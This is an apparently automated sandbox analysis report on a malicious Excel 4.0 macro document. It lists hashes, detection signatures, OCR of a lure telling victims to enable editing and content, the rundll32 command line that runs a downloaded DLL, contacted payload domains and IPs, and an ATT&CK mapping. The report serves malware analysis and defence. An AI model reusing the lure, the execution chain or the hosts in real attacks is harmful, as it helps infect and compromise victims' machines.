Loading ...

Play interactive tourEdit tour

Analysis Report 85095f36_by_Libranalysis

Overview

General Information

Sample Name:85095f36_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:412672
MD5:85095f36d19d0a0cc635a9e255730ea0
SHA1:8ec5f0d784134f08bce52949027a686cd099acd8
SHA256:a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2512 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 1616 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 2512

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 85095f36_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Document image extraction number: 6Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 6Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 85095f36_by_Libranalysis.xlsInitial sample: CALL
Source: 85095f36_by_Libranalysis.xlsInitial sample: CALL
Source: 85095f36_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 85095f36_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 85095f36_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\9DDE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD401.tmpJump to behavior
Source: 85095f36_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 85095f36_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
85095f36_by_Libranalysis.xls7%VirustotalBrowse
85095f36_by_Libranalysis.xls11%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com3%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2113689715.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2108853751.0000000001E27000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000002.00000002.2113478104.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2107539911.0000000001C40000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              192.185.39.58
              signifysystem.comUnited States
              46606UNIFIEDLAYER-AS-1USfalse
              192.185.32.232
              fcventasyservicios.clUnited States
              46606UNIFIEDLAYER-AS-1USfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412672
              Start date:12.05.2021
              Start time:21:05:31
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 42s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:85095f36_by_Libranalysis (renamed file extension from none to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@5/11@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.143.23, 2.20.143.16
              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              192.185.39.580b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                    090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                      54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                        54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                            afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                            192.185.32.2320b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          signifysystem.com0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.39.58
                                                                          fcventasyservicios.cl0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          UNIFIEDLAYER-AS-1US0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          SWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                          • 192.185.171.219
                                                                          d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                          • 67.20.76.71
                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                          • 192.254.186.229
                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                          • 192.254.186.229
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                          • 192.254.185.244
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          UNIFIEDLAYER-AS-1US0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          SWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                          • 192.185.171.219
                                                                          d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                          • 67.20.76.71
                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                          • 192.254.186.229
                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                          • 192.254.186.229
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
